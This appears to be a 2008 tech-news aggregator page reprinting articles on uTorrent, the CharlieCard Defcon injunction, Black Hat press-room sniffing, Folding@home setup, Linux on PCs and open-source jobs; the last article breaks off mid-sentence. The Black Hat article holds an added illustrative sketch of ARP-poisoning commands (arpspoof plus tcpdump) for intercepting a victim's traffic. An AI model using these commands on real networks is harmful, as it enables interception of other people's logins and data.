
Sunday, August 10, 2008

uTorrent 1.8 Released, Mac Version Coming Soon

Written by Ernesto

After months of hard work and more than six months since their previous stable release, the uTorrent team has released version 1.8 of their BitTorrent client, with significant improvements and updates. Adding to the excitement, we were told that a public Alpha of the Mac version will be released in the next few weeks.

uTorrent is the preferred client among many BitTorrent users. In December we reported that the number of uTorrent users worldwide had more than doubled in a year. At the time, 5.1% of all Windows PCs had the BitTorrent client installed, and this number has probably been growing further since then.

Users have had to wait a while for this new release, since the last stable uTorrent, version 1.7.7, was released back in January. A lot of work has been done in the meantime though, and the list of changes and additions that were implemented is “absolutely massive”, to quote Firon. One of the most significant updates in the latest version of uTorrent is that it comes with built-in IPv6 support, which improves connectivity and thus performance. Other new features are better Windows Firewall registration on Vista and improved distribution of new connections across torrents.

The journey from 1.7.7 has been a long one, but now that 1.8 stable is out, the uTorrent team will dedicate more time to developing the long-awaited Mac version of the client. uTorrent developer Greg Hazel told TorrentFreak that they will be “more heavily focused” on the Mac version now, which they have already worked on for more than a year. The good news for Mac users is that Greg hinted that the first public Alpha version will be released in just a few weeks.

uTorrent was initially developed by Ludvig Strigeus, and the first public version of the application was released in September 2005. A year later, in December 2006, uTorrent was acquired by BitTorrent Inc., but it will remain separate from other projects that the company is involved in. As Ashwin Navin, President and Co-founder of BitTorrent Inc., told us last year: “utorrent.com and uTorrent community will exist indefinitely. It’s vibrant and growing, and we value the feedback provided in the forums a lot.”

uTorrent 1.8 can be downloaded from the uTorrent website, and the list of changes, improvements and additions is available in the forum thread announcing the release.

Original here

Judge orders halt to Defcon speech on subway card hacking

MIT students Alessandro Chiesa, R.J. Ryan, Zack Anderson, and Electronic Frontier Foundation staff attorney Kurt Opsahl speak at a panel turned press conference at Defcon.

(Credit: Declan McCullagh/CNET News)

LAS VEGAS--A federal judge on Saturday granted the Massachusetts transit authority's request for an injunction preventing three MIT students from giving a presentation about hacking smartcards used in the Boston subway system.

The Electronic Frontier Foundation, which is representing the students, anticipates appealing the ruling, said EFF senior staff attorney Kurt Opsahl.

The undergraduate students had been scheduled to give a presentation Sunday afternoon at the Defcon hacker conference here that they had said would describe "several attacks to completely break the CharlieCard," an RFID card that the Massachusetts Bay Transportation Authority uses on the Boston T subway line. They also planned to release card-hacking software they had created, but canceled both the presentation and the release of the software.

U.S. District Judge Douglas Woodlock on Saturday ordered the students not to provide "program, information, software code, or command that would assist another in any material way to circumvent or otherwise attack the security of the Fare Media System." Woodlock granted the MBTA's request after a hastily convened hearing in Massachusetts that took place at 8 a.m. PDT on Saturday.

EFF staff attorney Kurt Opsahl said that the temporary restraining order is "violating their First Amendment rights"; another EFF attorney said a court order pre-emptively gagging security researchers was "unprecedented."

EFF attorneys appeared with the three students--Zack Anderson, R.J. Ryan, and Alessandro Chiesa--in front of a crowd of hundreds at an afternoon session at Defcon, but largely prevented them from answering questions, citing the lawsuit. Although Sunday's talk is canceled, Defcon organizers hinted that there may be a related presentation on a similar topic.

First page of subway-hacking presentation that was the subject of an injunction to stop its distribution--after it had already been distributed.

The students told reporters that they had, on their own, asked their professor to initiate contact with the MBTA a week before the government agency contacted them on July 30 or July 31. But the process was delayed because professor Ron Rivest was at a security conference near San Francisco, and no contact with MBTA was made at the time.

But then the conversations took a hostile turn when MBTA mentioned an FBI criminal investigation of the MIT students. In the "initial contact, they said the FBI was investigating and that was not--we didn't find that to be a very pleasing way to start a nice dialogue with them. And we got a little concerned about what was happening," said Anderson, one of the students.

EFF's Opsahl said the students only intended to "provide an interesting and useful talk, but not one that would allow people to defraud the Massachusetts" government.

The MBTA, which is a state government agency, alleges in its lawsuit that "disclosure of this information will significantly compromise the CharlieCard and CharlieTicket systems" and "constitutes a threat to public health or safety."

Its suit asks a judge to bar the students "from publicly stating or indicating that the security or integrity of the CharlieCard pass, the CharlieTicket pass, or the MBTA's Fare Media systems has been compromised." The requested order would also prevent them from circulating the summary of their talk, from providing any technical information, and from distributing any software they created.

That could be difficult to enforce. Every one of the thousands of people here who registered for Defcon received a CD with the students' 87-page presentation titled "Anatomy of a Subway Hack." It recounts, in detail, how they wrote code to generate fake magcards. Also, it describes how they were able to use software they developed and $990 worth of hardware to read and clone the RFID-based CharlieCards.

Those CDs were distributed to conference attendees starting Thursday evening, meaning the injunction arrived nearly two days late. (On the other hand, the source code to the utilities--not included on the CD--was removed from web.mit.edu/zacka/www/subway/ by Saturday morning.)

Court documents filed by MBTA suggest that representatives of the transit agency tried to pressure the students into halting their talk. During a meeting with the students and MIT professor Ron Rivest on Monday, MBTA Deputy General Manager for Systemwide Modernization Joseph Kelly unsuccessfully tried to obtain a copy of their planned presentation. Kelly spoke with Rivest again on Friday. (There was initial confusion about whether the meeting was Monday or Tuesday.)

Chiesa, Ryan, and Anderson at an Electronic Frontier Foundation panel.

(Credit: Declan McCullagh/CNET News)

A representative of the Defcon convention, who asked that her name not be used, said that the students submitted their PowerPoint presentation at least a month ago. The presentation says--not-so-presciently--"what this talk is not: evidence in court (hopefully)." It also says: "THIS IS VERY ILLEGAL! So the following material is for educational use only."

In addition, what looked like a black and white faxed copy of the entire presentation was entered as evidence in publicly available court records available on the Web on Saturday, meaning any attempt to limit its distribution further will encounter an additional hurdle.

Also released as part of the public record was a document marked "confidential" and written by the researchers that explains exactly how the Charlie cards can be cloned and forged. "Our research shows that one can write software that will generate cards of any value up to $655.36," the document says.

The document also discusses the lack of physical security at the MBTA. "Doors were left unlocked allowing free entry in many subways," the document says. "The turnstile control boxes were unlocked at most stations. Most shocking, however, were the FVM control rooms that were occasionally left open."

One portion of the MBTA's legal complaint that drew jeers from the Defcon crowd came in its odd claim that "A CharlieTicket standing alone constitutes a 'computer'" under federal antihacking law.

This isn't the first time speakers at security conferences have been hauled into court by companies seeking to muzzle them.

In 2005, Cisco Systems filed a lawsuit against security researcher Michael Lynn hours after he gave a talk at Defcon on how attackers could take over Cisco routers. The case was ultimately settled. Four years earlier, the FBI took Russian crypto expert Dmitry Sklyarov into custody at his Las Vegas hotel one day after he gave a presentation at Defcon on insecurities in e-book security software.

Another excerpt from the presentation distributed to thousands of Defcon attendees on CDs.

Princeton University computer science professor Ed Felten and his co-authors received legal threats from the recording industry involving a planned talk at a Pittsburgh security conference--but pulled the paper from the event, even though no lawsuit materialized.

Research into flaws in the encryption used by the Mifare Classic cards, which the MBTA relies on, recently landed Dutch researchers in court. NXP sued to block a Dutch university from publishing information about vulnerabilities in the encryption used in the RFID cards around the world. Last month, a court ruled that the university could publish the information.

Karsten Nohl, a University of Virginia graduate student who worked with others to break the Mifare Classic crypto algorithm last year, said MBTA should not have sued researchers who voluntarily discussed their findings with them.

"It has been known for years that magnetic stripe cards can easily be tampered with and MBTA should not have relied on the obscurity of their data-format as a security measure," Nohl said. "MBTA made it clear that they are not interested in cooperating with researchers on identifying and fixing vulnerabilities, but their lawsuit will motivate more research into the security of Boston's public transport system."

MIT's student newspaper has posted a copy of the presentation that was distributed on Defcon CDs and the subject of the court order.

In the video clip below MIT student Zack Anderson tells reporters how he felt when he learned about the lawsuit filed by the MBTA. The lawsuit was filed a few days after he had met with the agency to discuss concerns about his talk at Defcon. He is with fellow MIT students R.J. Ryan, Alessandro Chiesa and EFF attorney Marcia Hofmann, who was advising the students about what they could say in light of the temporary restraining order against them.

Original here

Google 'gadgets' called gateways for hackers

Hackers turned computer security specialists accuse Google of setting users up for online disasters by letting them personalize home pages with applications that could be tainted.

Software that hackers can trick people into installing on "iGoogle" home pages can track users' activities and control their machines, SecTheory chief executive Robert Hansen showed AFP on Friday.

"I could force you to download child porn or send subversive material to China," Hansen said. "The exploitation is almost limitless. Google has to fix it."

Google lets people customize iGoogle home pages with mini-software programs called "gadgets" such as to-do lists, news feeds, currency converters, and calendars.

Hackers can program malicious code into proffered gadgets or break into systems hosted by engineers providing legitimate mini-programs.

"It turns out a lot of people who develop these things aren't good at security," Hansen said, citing research he and Cenzic security analyst Tom Stracener shared at a notorious annual DefCon hacker gathering in Las Vegas.

"We pretty much break into anything we try."

Hackers can lure people to websites that trick them into installing applications on their iGoogle home pages. A hacker can remotely control a victim's computer as long as the iGoogle page is open.

Gmail users face danger from the same "hole" in security, according to Hansen, whose hacker name is "RSnake."

"We've been telling Google about these vulnerabilities for years and they have not made corrective actions," Hansen said.

"They chose to open the doors and insomuch put a lot of consumers at risk."

Google says it checks gadgets for malicious code, rarely finding any, and that it removes tainted programs.

Original here

Reporters booted from Black Hat for hacking

By Humphrey Cheung

Las Vegas (NV) – Three French reporters attending the Black Hat computer security conference have been banned for life for sniffing the press room network. The hackers worked for a French security publication called Global Security Magazine and admitted to capturing login information of two other reporters covering the convention. Our legal sources tell us the three could face federal charges for wiretapping.

We’ve spoken to the two victims who are reporters from CNET and eWEEK. They told us the French reporters sneakily “huddled over their computers” while plugged into the Netgear Ethernet switches in the press room. The trio were also seen using an AirPcap USB capture card to sniff wireless traffic.

The French reporters captured traffic and then showed their results to the Wall of Sheep team in the hopes of getting the information posted. However, the team refused because there is an unwritten rule at Black Hat/Defcon that the press room network is off limits to scanning. Coincidentally, I was already in the room interviewing the Wall of Sheep team members and the French reporters let me take a picture of their screen.

I published that picture and a short accompanying article here. Shortly before the article went live, TG Daily’s editor in chief Wolfgang Gruener called CNET to warn them about a possible breach in their network security. Black Hat staff warned eWEEK’s Brian Price after our article went live.

Price confirmed to us that the login in the picture was indeed a valid one. That username and password has since been changed and Price is taking everything in stride. He told us that it was a good lesson in security and that he’ll be more careful in the future. On the CNET side, it appears the login information isn’t valid and that the French reporters possibly made up the information.


The French reporters are Mauro Israel, Marc Brami, and Dominique Jouniot, and they didn't deny sniffing the network when confronted by Black Hat officials. They added that they conducted a classic man-in-the-middle attack. The reporters have been permanently banned from Black Hat and Defcon, which continues a long tradition of reporter bans at the hacker conventions. Last year, Dateline's Michelle Madigan quickly escaped from Defcon after being caught secretly filming attendees. Before that, reporters and cameramen from Argentina and Israel had been booted.

Afterwards, the head of Black Hat technical operations explained that people shouldn't automatically assume that switched networks are safe from sniffing. He said there were several ways of obtaining traffic, such as ARP poisoning or running a rogue DHCP server to route traffic through the attacker's laptop.
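
As a rough illustration of the ARP-poisoning approach he described (this sketch is not from the article; the interface name and addresses are made up, and it assumes the widely available dsniff and tcpdump tools), an attacker on the same switch could do something along these lines:

# echo 1 > /proc/sys/net/ipv4/ip_forward                 # keep forwarding traffic so the victim stays online
# arpspoof -i eth0 -t 192.168.1.23 192.168.1.1           # tell the victim (192.168.1.23) that we are the gateway
# tcpdump -i eth0 -w press-room.pcap host 192.168.1.23   # in a second terminal, record the redirected traffic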

Kurt Opsahl, a senior staff attorney with the Electronic Frontier Foundation, said the French probably committed multiple crimes since there was a reasonable expectation of privacy on the press network. While he would not go on record about specific charges (since he wasn’t familiar with all the details), Opsahl said legal cases in the past have focused on whether people expect to be hacked on a specific network. At Black Hat and Defcon, you are almost guaranteed to be sniffed, hacked and owned by attendees, but the private press network is a different story. Another legal source told us the hacking attempt could be a federal felony under Title 18 section 2511 of the United States Code.

While the situation is very unfortunate and shady on the part of the French contingent, it does slam home the point that you can’t trust any network … even one that has been promised to be off-limits to scanning. As more details of the hacking emerged, several reporters in the room were scrambling to change their login details for their various content management systems.

Original here

Windows Live Messenger 9.0 to get new GUI, thanks to WPF

By Emil Protalinski

It looks like Christmas will be arriving early, especially for frustrated Windows Live Messenger testers. With the closing of the first Windows Live Messenger 9.0 beta program in June, testers were not given much information about what Microsoft was planning to put into version 9.0 (the first beta build showed few changes). The beta testing program officially closed on June 24, 2008, after which testers could still use the 9.0 beta Messenger client, but since the Connect page closed down, the installer was no longer available for download.

According to Messenger Stuff, the developer team has a few surprises up its sleeve. The first and biggest one comes in the form of the Windows Presentation Foundation (WPF):

After being tipped off by an unaffiliated yet trustworthy source who – naturally – doesn't want to be identified, Messenger Stuff can now reveal that the new interface will use the graphics effects available through WPF [Windows Presentation Foundation] where supported (i.e. on Vista and with a decent graphics card).

WPF, which comes preinstalled on Windows Vista and is available for download for Windows XP, is a graphical subsystem in .NET Framework 3.0 that many have touted as a very consistent programming model. Unfortunately, few have put it to use, and Microsoft is hardly a leader in the area. The company's decision to use WPF is probably in response to complaints that competitors like Yahoo have already begun testing their own "next-generation" messenger clients, and while Yahoo is using WPF, Microsoft looked like it was quite content just twiddling its thumbs.

After gathering over 1,000 bugs and suggestions, sending testers through three different surveys, and sifting through nearly 5,000 messages in the newsgroup, Microsoft closed off the beta, as it was satisfied with the amount of feedback it had gained from the program. The team was ready to go back to work and hopefully it will implement some of the suggestions (tabbed convos please!). Microsoft is readying another beta of Windows Live Messenger 9.0 "later this year," to which it will invite previous testers.

Original here

Obama Supporters Prefer Firefox

The EOO staff and I check our traffic logs multiple times per day to see how many people are coming to the site, what they're looking at, etc. etc. It's amazing the depth of information that we get. One set of numbers that really sticks out is browser usage. We've had about 500,000 visitors over the past 3 months, of which 61% use Firefox, 23% use IE, and 11% use Safari. Opera and some browsers I haven't heard about before make up the rest of the traffic.

In talking to other webmasters, it seems that their browser usage stats hover around 65% IE to 30% Firefox. Those numbers mirror what is reported on the web as the national average. So what's going on here? Is our site an anomaly, or are internet users trending towards Firefox and it's just not being reported yet?

I have to admit that I'm pleased to see the numbers where they are. From a development perspective, IE has been a travesty for a long time. Firefox is (comparatively) closer to standards than IE, and so our development cycle typically consists of building new applications, like the Veepstakes game for example, getting them working in Firefox, and then hacking them to work in IE.

Who knows, maybe this could serve as a wakeup call to Microsoft to put out a better product. I'm not going to hold my breath on that one. I am curious though, are other websites experiencing the same shift? Or is it just in the political realm – maybe just on liberal / progressive sites?

Original here

Configuring Folding@home for Linux

Written by Pavs

From folding@home website:

Folding@home is a distributed computing project — people from throughout the world download and run software to band together to make one of the largest supercomputers in the world. Every computer takes the project closer to our goals. Folding@home uses novel computational methods coupled to distributed computing, to simulate problems millions of times more challenging than previously achieved.

Today we will show how to configure and run folding@home, and use a GUI frontend called Prothink to observe progress. I am sure there are others but we will focus on Prothink.

First we will download and extract the Folding@home client from its website here.



Then we will move to the extracted folder and run the install.sh script to start the configuration: sudo ./install.sh install

Here you can safely accept the default values unless otherwise applicable (i.e., you have more than one CPU). After you are done with the configuration, you can start Folding@home by entering sudo /etc/init.d/foldingathome start. You can check with top or htop to see if it's running.
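
For reference, the whole sequence looks roughly like this (the archive and directory names below are only placeholders; use whatever the download actually gives you):

$ tar xzf folding-client.tgz          # placeholder archive name
$ cd folding-client/
$ sudo ./install.sh install           # accept the defaults unless you have more than one CPU
$ sudo /etc/init.d/foldingathome start
$ top                                 # or htop; check that the folding process is running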

In its default setup, the best way to follow folding progress is to tail the FAHlog.txt file located at /opt/foldingathome/1/.
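
For example, to watch the log update as the work unit progresses:

$ tail -f /opt/foldingathome/1/FAHlog.txt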

To get a much better progress view than this, we can use a nice little program called Prothink (Protein + Think), which you can download from here. Extract it, move into the directory, and execute the setup script to start the configuration: python fahsetup.py

One thing to note during configuration is that it will ask for your unitinfo.txt, which is located at /opt/foldingathome/1/. Run Prothink by typing python fahmain.py.
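
Roughly, the Prothink steps look like this (the directory name is just a placeholder for wherever you extracted the archive):

$ cd prothink/                        # placeholder directory name
$ python fahsetup.py                  # point it at /opt/foldingathome/1/unitinfo.txt when asked
$ python fahmain.py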

I usually run folding on all of my personal computers when they are not in use, and try to encourage my friends and family to do the same. Personally I believe this has a much greater significance than joining seti@home. Right now I haven’t joined a group and I submit my results anonymously, but I am thinking about creating a linuxhaxor group if there is enough interest. :) let me know guys, maybe we can make a tiny bit of difference in this world.

Original here

Linux on Servers? Great. On PCs? Not So Much

SAN FRANCISCO—PC OEMs offered a halfhearted endorsement of the Linux desktop on Wednesday, claiming that the operating system was mainly suited for low-cost appliances and PCs designed for education.

Two vendors of consumer Linux distributions, gOS and Xandros, spoke glowingly about the OS and its future. But representatives of three PC OEMs next to them – Dell, HP, and Lenovo – declined to commit to the operating system as a platform for their machines, with the exception of the education market.

The real future for Linux? Netbooks, nettops, and other appliances, where Linux is being slotted in at the low end of the market as a Windows replacement. The message, if there was one, was that Linux's mainstream success on the desktop was directly tied to the success of the low-cost netbook/nettop/appliance market, and to enthusiasts' efforts to install and run Linux themselves.

"In traditional desktop and notebook platforms, growth there is going to be tepid," said Jim Mann, a product strategist for HP's notebook division. "The really explosive growth is in appliances."

The question that opened the panel discussion here at LinuxWorld was a simple one: now that OEMs have begun shipping Linux on PCs, now what? The answer seemed to be that Linux remains a solid, dependable operating system, but with some significantly frayed edges.

In notebooks, for example, Linux "is not as good as Windows" in power management, according to Debra Kobs, a development team member and software strategist for Lenovo. That has helped Windows gain traction in the mid-range netbook market at price points of $500 or above, others noted. As the price climbs, the price of a Windows license becomes more easily factored in.

All three OEMs have eased Linux into the desktop and notebook market: Lenovo, by preloading Linux on ThinkPad notebooks; HP, with its Compaq nx5000 Linux-based notebook; and Dell, which has preloaded Ubuntu on certain desktop models as a response to customer feedback on its IdeaStorm Web site.

This week, IBM, Canonical/Ubuntu, Novell, and Red Hat said that they, along with a number of unnamed hardware partners, will ship "Microsoft-free" PCs with Lotus Notes and Symphony beginning in 2009. When asked if they would be among the partners, all three OEMs were silent.

What's holding Linux back? When asked what they would have the Linux community improve, all three OEM representatives named power management. HP's Mann added the lack of good wireless support. John Hull, manager of an engineering team at Dell, wanted shorter boot times. And Mann added, "don't ever make me open a terminal window and access a command prompt."

That doesn't mean the OS hasn't had its successes. All three said that Linux had been well-received by the education market and third-world countries, and not just One Laptop Per Child low-cost PC efforts.

Still, the panel seemed to indicate that many still see Linux as just a cheaper alternative to Windows, rather than an operating system that has its own advantages. In education, for example, Lenovo's Kobs explained the appeal of Linux as a "low cost computing solution." "Looking at the business offering, one of the things we continue to look at on a regular basis is price," Kobs said. "It is one of the most important things."

Not surprisingly, the two Linux vendors represented on the panel took a different view. David Liu, the chief executive of gOS, which launched gOS 3 this week, said the Linux community needs to improve the user interface – not surprisingly, as that is gOS' goal – as well as the underlying drivers and Linux applications. "I guess the short answer is can we change the UI and apps, and not just cost down" – or lower the cost of – "the platform," he said.

But Linux also has to carve out its own niche, he said. "How do we tell consumers and tell our partners on the hardware side…how it fits into the ecosystem?" he asked.

The answer may be in the way Linux is presented to the world through the low-cost netbook market. Still a tiny fraction of sales – roughly 3 percent, according to a recent Gartner report – Linux-based products like the Eee PC have become an unexpected hit with women aged 35 to 45, according to Kelly Fraser, a desktop product manager with Xandros.

The problem is that Microsoft, in turn, has recognized the issue and has extended the lifespan of its Windows XP Home Edition software to compete with Linux-based netbooks. "I think Linux companies like ourselves want to work closely with companies aligning themselves with the next wave of appliances," Liu said. "But we have to see the opportunity and take it before others step in and fill the gap."

Original here

Open source technology is hungry for new college grads

By Amber Gillies

Many college graduates are finding it difficult to enter the information technology world with little or no work experience. There is no such thing as an entry-level position anymore, and more and more graduates are finding themselves in a catch-22 situation because of this.

Searching the numerous jobseeker Web sites, such as dice.com, will return thousands of positions available in the IT field. But when you look closely, most positions, such as an entry-level software engineer, have a minimum requirement of at least one year's work experience in a related field. The search field criterion doesn't even offer a selection for graduates with less than one year's experience.

You will find that some major companies, such as Microsoft, offer paid training courses to students pursuing a degree, but out of five positions listed at the time this article was written, only one would accept students who only had classroom coding experience. The remaining positions required one to two years of experience, and there were no positions available for recent graduates. When you consider the number of students searching for that "dream job" at a big corporation, you soon realize that your chances of getting a response to your application are slim to none -- especially if you don't have work experience. We have all heard, over and over, that there will always be a need for workers in technology, but getting your foot in the door is a whole 'nuther ballgame.

So what do you do next? Go get a job at a pizza joint, Taco Bell or Burger King until you land that dream job you are so desperately seeking? Stop right there. There are plenty of options available to you in open source technology. Developers in open source technology are always looking for someone who is going to help create the next new groundbreaking application that will take the world by storm. And the best part is, it's free and, in most cases, you can work from the comfort of your own home.

The key to being successful in the IT industry is interning while still attending college and taking some certification courses after graduation. Do some research. Find an open source technology company that will provide you with the tools and resources you will need to build your career. Open source spans platforms, middleware and applications from data centers to desktops. There are many companies that offer internship programs and certification courses.

Google and Red Hat are major contributors to Linux and open source technology. According to Google, each time you use the Google search engine you are using open source software; the company relies on the Linux kernel, GCC, Python, and Samba, and commits code into each of those projects. Google maintains a healthy relationship with the open source software development community by releasing Google-created code, providing vital infrastructure, and by creating new open source software developers through programs such as the Google Summer of Code. Red Hat offers a summer intern program and certification courses for undergraduates, graduates, and candidates who hold a master's degree in business administration.

Google Summer of Code

Angela Byron, a former Google Summer of Code participant, began working for Drupal immediately after she completed the program.

Over the past three years, the GSoC program has brought together more than 1,500 students and 2,000 mentors from 90 countries worldwide, all for the love of code. This year alone, Google welcomed 1,125 student contributors and 175 free and open source projects into the program.

"Google's SoC is a formal sponsorship program tailored specifically to open source," Angela Byron says. Byron, a former student sponsored by Google in 2005 to participate in GSoC, is currently a senior Web architect for Lullabot, which provides consulting and training for Drupal and other open source software. The core Drupal software is a framework that power community-driven Web sites, and includes features such as internationalization, tagging, and an extensive roles and permissions system. The architecture supports more than 1,000 sub-projects in the form of contributed modules and themes.

"My primary role has changed from developing Drupal Web sites myself to consulting with large clients such as MTV, Sony BMG Records, BBC, and Popular Science magazine that use Drupal. My job is to help train their developers, help architect Web sites [mapping wireframes to Drupal functionality], and to impart best practices and advice that I've picked up from working in the Drupal community over the past three years. Lullabot also gives us time built into our working schedule to work on Drupal itself," Byron says.

Byron began working with the Drupal project during GSoC 2005. She is still actively involved with GSoC's mentoring organizations, went on to become an organization administrator for GSoC 2006, and sits on the board of directors for the Drupal Association.

Byron thinks it is beneficial for college students to intern with a company to secure a position upon graduation. "An internship is a nice opportunity for both an employer and an employee to size each other up to see if they'd be a good match. And 'real world' experience will always trump anything you read in a book," she says.

Drupal internships and jobs at Drupal companies are available for college students and jobseekers. Some of the employers there may be open to taking on new grads or interns if asked, Byron says.

Byron says there are other opportunities available to college students as well. The Knight Foundation provides a grant program for people who want to implement innovations in local media. There's also a Knight-sponsored, Drupal-specific initiative. But none of this is necessary, she says, because getting involved in an open source project requires nothing more than doing some background reading to find good spots to look into -- and then diving in.

In 2005, Byron graduated from Nova Scotia Community College's IT programming program, which is a two-year diploma program. She has had no formal computer science training and no university education. "I've been mostly self-taught, but I went to school to help fill in some of the gaps," Byron says. "One of my instructors, Ian Macleod, mentioned GSoC. It sounded like a wonderful opportunity to me. I'd had a love of open source basically since I first heard the term in the late '90s, but I had always lacked the confidence to believe that I could be part of it. To be able to get my foot in the door, and to be paid to do it at the same time, was basically a dream opportunity. So I applied, figuring what the heck."

According to Byron, mentoring organizations [open source projects] from around the world can apply to Google to be chosen to participate in GSoC. Google allocates a number of "student slots" to the organization, each of which corresponds to a $5,000 investment: $500 for the organization and $4,500 for the student. Mentoring organizations then submit a list of possible project ideas, a list of mentors they have available, and answer some questions about how to handle problems that inevitably come up, such as student or mentor disappearances during GSoC. Once the mentoring organizations are chosen and announced by Google, the student application period is open. Students have the chance to apply to one or more mentoring organizations, with either a project of their own devising or by choosing one from the ideas list provided. During this period, the mentoring organizations rank the students' applications based on a number of criteria, including overall impact of the project to the organization [if it solves some long-standing problem or opens the project to new target audiences], how well-written the application is, how responsive the student is to clarification requests, etc.

"Someone reading about GSoC might come away thinking the sole goal of the program is for open source organizations to use Google's money to pay students to work on much-neglected or much-needed features," Byron says. "What a sweet deal. However, I believe GSoC is more about attracting and retaining talent to an open source project than it is about producing fantastic code.

"As an organization administrator for Drupal," she says, "I would much rather have only semi-fantastic code from a student who stays on with the project long-term, and gets involved in other aspects, such as documentation and core development, than a 100% working thing of beauty from a student who we never hear from again after GSoC is finished."

Angela Byron, left, helps a new contributor get started with Drupal at Drupalcon.

GSoC provides many benefits to students and mentoring organizations. "Students work on something fun that they enjoy, and get paid to do it," Byron says. "It greatly lowers the barrier of entry to getting involved in an open source project." GSoC assigns a mentor to each student, who helps review code and works with students on any issues. "And if they can't help you, they know someone else who can," she says. Students also learn valuable life and technical skills, such as communication skills, how to work in a distributed and international team, and how to take complex problems and break them down into manageable tasks. GSoC also helps students become more marketable to prospective employers. Mentoring organizations benefit by getting new contributors and new code for existing projects, plus money from Google for each student they mentor. "It's a great way to 'bug test' your documentation to see if it's easy for new people to get up to speed," she says. "[Potentially] long-term contributors get completely immersed and start taking on additional roles in the project. Since open source projects thrive on contributors, the opportunity to obtain more of them is a huge benefit.

"Working in open source effectively gives you an open resume," Byron continues. "Instead of taking you at your word, your employer can actually look at your code and see its progression from when you first started on a project until now. They can view your interactions with fellow community members and see how you can effectively solve problems in a team environment. You demonstrate your ability to use collaboration tools necessary for serious software development."

Jobs available upon graduation depend on where, and to what extent, you get involved in open source and the open source community, according to Byron.

  • Programmer: Open source exposes you to development best-practices, how the "pros" do things, etc. It's a great way to take some fundamental knowledge of a particular language and learn it to a much greater depth.
  • Systems administrator: Sometimes working in an open source community requires tinkering around at the network/operating system level. You can turn this skill into a job.
  • Web designer: Web-based projects expose you to a lot of knowledge required on the front-end of things, such as XHTML, CSS, JavaScript, etc.
  • Designer: Some open source communities know a lot about coding, and not a lot about design. Coming into a project with an eye for design can help you to build your portfolio with icons, advertisements, page designs, and more.
  • Instructor: If you start to really know your field, you can get jobs teaching about the project or areas related to the project.
  • Technical writer: Diving into documentation can provide you with valuable experience, which can turn into a career as an author for technical documentation.
  • Translator: Open source gives you a chance to work in an international community. Time spent learning how to translate between languages can also turn into a job.
  • Specialist: Some open source projects are extremely powerful, but require depth of knowledge in order to get the most out of the tool. If you have studied the guts of a program, and know it inside and out, you may be able to tap into a niche market.
  • Project manager: Depending on the project, open source communities may provide opportunities for getting involved in a management capacity. Skills managing an open source project can be translated directly into skills managing a "real world" project as well.

Byron says she loved becoming a part of a thriving open source community, the challenge of the project, learning new things every day, and helping other people. "This program served to completely shatter the myths I had about how open source projects worked. I thought everyone who works on open source is this enormous genius with a huge brain and is some sort of god of programming, which paralyzed me from getting involved in open source for nearly 10 years," she says. This perspective is hilarious to her now. The issue queues are filled with patches that break things, use totally inefficient algorithms, and even cause security holes, she says. "Everyone contributes what they can, whether it's a starter solution, a fantastic algorithm that'll blow your mind, a confirmation that the change works on Internet Explorer 6 under Windows XP, or documentation that has proper grammar and sentence structure," she says.

Byron's work within the open source community was a huge stepping stone in her career. She learned time management skills because she was responsible for managing her own time, setting her own deadlines, and sticking to them. She learned better development skills and how to work in a distributed, culturally diverse team. "Suddenly I was collaborating with people in Hungary, Germany, and the United States," she says.

Byron offers some sound advice for students who have never worked in a development environment. She had never installed Drupal before GSoC started and she needed to go from knowing nothing about it to being able to code something that worked with it in a short period of time. "Get over the fear of asking questions," she says. "Instead of smashing your face on the problem for three days, mentors are available who will answer your question in five minutes. Realizing that it's perfectly OK to ask questions [and, in fact, encouraged], was one of the hurdles I had to get over. Students also have the tendency to avoid committing projects until they're so clean and shiny you can eat off them. When I finally learned to 'commit early, commit often,' I had fewer headaches and a lot more help," she says.

Byron chose Drupal as her mentoring organization because she had seen it used on the Firefox grassroots marketing and activism Web site for the open source browser, she says. "I chose to apply for the 'Quiz module,' which allows people to use Drupal to build Web-based quizzes and tally the results. The idea was for educators to be able to use Drupal's community features such as commenting, ratings, and revisions to collaborate together and come up with the best questions possible. Three years later, I am happy to report that the module is still being actively maintained by other members of the Drupal community, and it's being used on some high-profile Drupal Web sites, such as Lifetime Television."

Within days of completing GSoC, people in the community began paying Byron to make themes, code modules, fix bugs, etc. She suddenly found herself to be an independent consultant with her own home-based Drupal business. "One of the people I did contract work for was Kieran Lal, who was with a Drupal company called CivicSpace Labs. He had seen me actively participating in the Drupal community, and paid me to drive a couple of patches home, and to write some gnarly technical documentation about the new Form API that had just been added to Drupal. After this kind of 'test drive,' he ended up hiring me to work full time, and that became my first Drupal job in November 2005 -- three months after completing GSoC," Byron says.

Currently, Byron manages Drupal's participation in GSoC. Each year, she finds more than 50 mentors and helps them build an ideas list. She helps manage the application voting process, status reports, and acts as a general resource for anyone [student or mentor], who has problems during GSoC. She is behind efforts that help get new contributors into the Drupal project. "Last year, I helped manage Drupal's participation in the Google Highly Open Participation contest, which was a GSoC-like program, but for 13- to 18-year-old students, with a focus on short-term tasks rather than two-month long projects," she says.

Byron also manages Drupalchix, so women in the Drupal community will have a safe place to ask questions, talk about their experiences, and discuss how to increase the number of women involved with the project. She is also on the Drupal documentation team, and actively recruits others to help out. She has been a Drupal speaker at Google, at the Women in Open Source conference at SCALE 2008, and several other events.

During the past two years of mentoring at GSoC, some of her participating college students have become successful, including Jimmy Berry, Aron Novak and Rok Žlender, just to name a few. "Berry was a GHOP student who increased Drupal's automated test coverage by many orders of magnitude, and is now working on the Usability Testing Suite, which will allow field testing of proposed user interface changes in order to get immediate feedback from users. Novak is a three-time GSoCer with Drupal, who is passionate about re-tooling Drupal's feed aggregation system," Byron says. "Žlender's GSoC project was around an automated testing framework for Drupal, and he was hired by NowPublic, a citizen journalism Web site powered by Drupal, to help manage internal testing procedures. Several of our students have gone on to jobs within Drupal shops and one at Google itself."

Red Hat

Google and Drupal are not the only organizations seeing a boom in open source technology. The number of Red Hat-sponsored open source projects increased from 16,000 in 2001 to 150,000 in 2007.

DeLisa Alexander, senior vice president of Human Capital at Red Hat, doesn't believe it is necessary for college students to intern with a company to secure a position upon graduation. "People often get jobs at companies like Red Hat, with no previous relationship to the company. However, interning certainly can assist in opening doors and building relationships that lead to full-time employment," Alexander says.

In addition to entry-level positions in software maintenance and technical support, Alexander says there are many other positions available to graduates who have worked on open source projects. "With a background working on open source projects," Alexander says, "there are related roles in engineering, sales and marketing. Positions like these are available at Red Hat, and candidates can review our careers site to find more information." There are also many jobs available to graduates who don't have general exposure to open source but have Linux experience and the desire to learn more. "Having Linux systems management experience helps differentiate an applicant," Alexander says.

According to Alexander, Red Hat offers jobs to college students with excellent open source coding skills. "This is often facilitated by the close relationship that Red Hat maintains with the Fedora community.

